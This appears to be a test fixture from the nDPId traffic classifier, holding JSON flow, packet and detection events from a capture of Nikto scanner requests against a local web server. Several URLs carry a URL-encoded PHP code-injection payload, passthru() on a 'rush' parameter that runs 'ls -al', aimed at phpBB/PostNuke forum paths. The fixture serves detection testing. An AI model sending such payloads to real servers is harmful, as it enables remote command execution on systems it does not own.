-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} -01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 